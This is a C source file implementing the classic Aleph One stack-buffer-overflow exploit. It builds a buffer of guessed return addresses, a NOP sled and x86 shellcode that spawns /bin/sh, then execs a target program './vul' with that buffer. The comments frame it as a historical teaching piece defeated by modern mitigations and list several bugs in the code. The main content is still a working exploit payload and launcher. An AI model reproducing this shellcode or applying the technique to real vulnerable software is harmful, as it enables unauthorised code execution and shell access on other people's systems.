/*
 * Stack-smashing exploit code based on that given in
 * Smashing the Stack for Fun and Profit by Aleph One
 *
 * Demonstration of the classic (1996-era) technique: a buffer is filled
 * with a guessed return address, a NOP sled and a machine-code payload,
 * then handed as argv[1] to a separate program ("./vul", below) whose
 * stack buffer it is expected to overrun.  Everything here assumes a
 * 32-bit x86 process whose stack is executable and sits at a predictable
 * address.  Each of those assumptions is removed by a mitigation that is
 * now a toolchain/OS default: stack canaries (-fstack-protector), a
 * non-executable stack (NX / W^X), ASLR, and 64-bit ABIs; the presence of
 * any one of them is why this code is of historical/teaching value only.
 *
 * NOTE(review): the header names after each #include were lost when this
 * page was extracted.  The calls used below (fprintf, exit, malloc,
 * memset, memcpy, strlen, execlp, perror) are declared in <stdio.h>,
 * <stdlib.h>, <string.h> and <unistd.h>.
 */
#include
#include
#include
#include

/* Byte used for the NOP sled (x86 single-byte NOP). */
#define NOP 0x90

/*
 * Payload bytes copied into the second half of the buffer.  Its length is
 * taken with strlen() below, so the sequence must not contain a NUL byte;
 * that is also why this is kept as a C string rather than a byte array
 * with an explicit length.
 */
static char shellcode[] =
    "\xeb\x12\x5e\x31\xc0\x88\x46\x07"
    "\x50\x56\x31\xd2\x89\xe1\x89\xf3"
    "\xb0\x0b\xcd\x80\xe8\xe9\xff\xff"
    "\xff\x2f\x62\x69\x6e\x2f\x73\x68";

/*
 * Neat way of determining stack top address
 *
 * Returns a value derived from the current stack pointer.  There is no
 * return statement: the function relies on the 32-bit x86 calling
 * convention placing the return value in %eax and on the compiler not
 * clobbering %eax between the asm statement and the return.  That is
 * undefined behaviour in standard C; it is only meaningful when built
 * as 32-bit x86 code, and even then the value is compiler dependent.
 * Under ASLR the stack base differs on every run, so the "offset"
 * guess computed from this value in main() is not stable either.
 */
static unsigned int getesp(void)
{
    __asm__("movl %esp,%eax");
}

/*
 * Usage: <prog> bufferbytes offset
 *
 *   bufferbytes  size of the buffer to build (a NUL is appended, so the
 *                allocation is bufferbytes + 1)
 *   offset       subtracted from the current stack pointer to produce the
 *                address written throughout the buffer
 *
 * Builds the buffer, prints the addresses it used, then replaces this
 * process with "./vul", passing the buffer as the single argument.
 * Returns 0 only if execlp() itself fails (the failure is not reported).
 *
 * NOTE(review): neither argv[1] nor argv[2] is validated.  atoi() yields
 * 0 for non-numeric input and has no overflow detection; a negative
 * bufferbytes wraps when stored in the unsigned `bytes`, which is then
 * passed to malloc().
 */
int main(int argc, const char *argv[])
{
    unsigned int addr;      /* address written into every word of the buffer */
    unsigned int bytes;     /* allocation size, including the terminator */
    unsigned int *ptr;      /* word-sized cursor over the buffer */
    char *args[3];          /* argv handed to the target program */
    char *code;             /* the buffer being built */
    int numints;            /* whole words that fit in `bytes` */

    /* Where is the stack top? This is our starting point */
    /*
     * %p with a (void *) cast of an unsigned int: on a 64-bit build this
     * prints a truncated 32-bit value, another reason the program only
     * makes sense as 32-bit x86.
     */
    (void) fprintf(stdout, "Stack: %p\n", (void *)getesp());

    /* Check command line arguments */
    if (argc != 3) {
        (void) fprintf(stderr, "Usage: %s bufferbytes offset\n", argv[0]);
        exit(EXIT_FAILURE);
    }

    /*
     * We will overflow a return address in our vulnerable program
     * with this address. It should point to the NOPs in our code
     * buffer.
     *
     * The arithmetic is done in unsigned int; a negative atoi() result
     * simply moves the guess upward.
     */
    addr = getesp() - atoi(argv[2]);
    (void) fprintf(stdout, "Using address %p\n", (void *)addr);

    /* Make room for the code (we add one extra for the null byte) */
    bytes = atoi(argv[1]) + 1;
    code = malloc(bytes);

    /* Check malloc succeeded */
    if (code == NULL) {
        perror("malloc()");
        exit(EXIT_FAILURE);
    }

    /* How many addresses required to fill buffer? */
    /*
     * Integer division: when `bytes` is not a multiple of sizeof *ptr the
     * trailing bytes % sizeof *ptr bytes are not touched by the loop
     * below, and when bytes < sizeof *ptr this is 0.
     */
    numints = bytes / sizeof (*ptr);

    /* Initialise entire buffer to return address */
    /*
     * NOTE(review): a do/while always executes once, so with numints == 0
     * (bufferbytes < 3) one full word is written into an allocation that
     * is smaller than a word, and numints-- then wraps to -1, so the loop
     * keeps writing past the allocation.  `code` is also accessed through
     * an unsigned int * here, which violates strict aliasing.
     */
    ptr = (unsigned int *)code;
    do {
        *ptr = addr;
        ptr++;
        numints--;
    } while (numints);

    /* Add terminal byte */
    code[bytes - 1] = '\0';

    /* Set first half to NOPs */
    (void) memset((void *)code, NOP, (bytes >> 1));

    /* Put shellcode after NOPs */
    /*
     * NOTE(review): no check that strlen(shellcode) fits between the
     * midpoint and the terminator; with a small bufferbytes the copy runs
     * past the end of `code`.
     */
    (void) memcpy(code + (bytes >> 1), shellcode, strlen(shellcode));

    /* Output data */
    /* NOTE(review): strlen() returns size_t, so the matching specifier is %zu, not %d. */
    (void) fprintf(stdout, "Sending in buffer length: %d\n", strlen(code));

    /* Set up for call to vulnerable program */
    /*
     * The target path is fixed and relative to the working directory.
     * execlp() is given the array elements individually; args[2] (NULL)
     * terminates the argument list.
     */
    args[0] = "./vul";
    args[1] = code;
    args[2] = NULL;

    /* Attack! */
    /*
     * On success this process image is replaced and nothing below runs.
     * The return value is discarded, so a failed exec (e.g. "./vul" not
     * present) falls through silently to return 0; `code` is never freed
     * on that path.
     */
    (void) execlp(args[0], args[0], args[1], args[2]);

    return (0);
}